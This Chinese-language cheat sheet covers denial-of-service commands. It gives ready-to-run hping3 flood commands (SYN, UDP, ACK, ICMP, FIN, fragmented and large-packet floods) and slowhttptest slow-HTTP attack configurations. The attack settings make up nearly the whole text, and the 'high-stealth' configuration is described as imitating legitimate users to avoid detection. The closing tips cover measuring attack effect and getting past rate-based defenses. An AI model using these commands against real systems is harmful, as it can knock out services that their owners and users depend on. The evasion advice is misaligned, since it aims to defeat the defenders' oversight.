hping3 命令详解
hping3 是一款功能强大的网络测试工具,可用于多种网络测试场景。以下是常见用法:
TCP SYN 泛洪攻击
hping3 -S -p <目标端口> --flood <目标IP>
-S: 设置SYN标志位(建立连接请求)--flood: 高速发送模式(不等待响应)
UDP 泛洪攻击
hping3 --udp -p <目标端口> --flood <目标IP> --data <包体大小>
--udp: 使用UDP协议--data: 指定数据包大小(字节)
ACK 泛洪攻击
hping3 -A -p <目标端口> --flood <目标IP>
-A: 设置ACK标志位(确认数据包)
ICMP 泛洪攻击
hping3 --icmp --flood <目标IP>
--icmp: 使用ICMP协议(ping)
FIN 泛洪攻击
hping3 -F -p <目标端口> --flood <目标IP>
-F: 设置FIN标志位(关闭连接请求)
分片FIN攻击
hping3 -F -p <目标端口> --flood --frag <目标IP>
--frag: 启用数据包分片功能
大包SYN攻击
hping3 -S -p <目标端口> --flood --data <包体大小> <目标IP>
- 结合SYN标志和大数据包增加攻击效果
slowhttptest 命令详解
slowhttptest 是专门用于慢速HTTP攻击测试的工具:
基础命令格式:
slowhttptest -c <最大并发连接数> -H -i <发送间隔/s> -r <每秒新建连接数> -u <目标URL>
参数调优策略
高隐蔽性攻击配置
slowhttptest -c 1000 -H -i 30 -r 50 -u http://target.com- 增大发送间隔(
-i 30秒) - 降低新建连接速率(
-r 50/秒) - 模拟合法用户行为,避免被检测
- 增大发送间隔(
高强度攻击配置
slowhttptest -c 5000 -H -i 5 -r 500 -u http://target.com- 减小发送间隔(
-i 5秒) - 提高新建连接速率(
-r 500/秒) - 快速消耗目标服务器资源
- 减小发送间隔(
专业提示
- 在实际测试环境中,建议先从小规模开始,逐步增加压力
- 监控目标系统资源使用情况以评估攻击效果
- 不同协议的攻击适用于不同防御机制,需要根据目标特点选择
- 慢速攻击特别适用于绕过传统基于速率的防御系统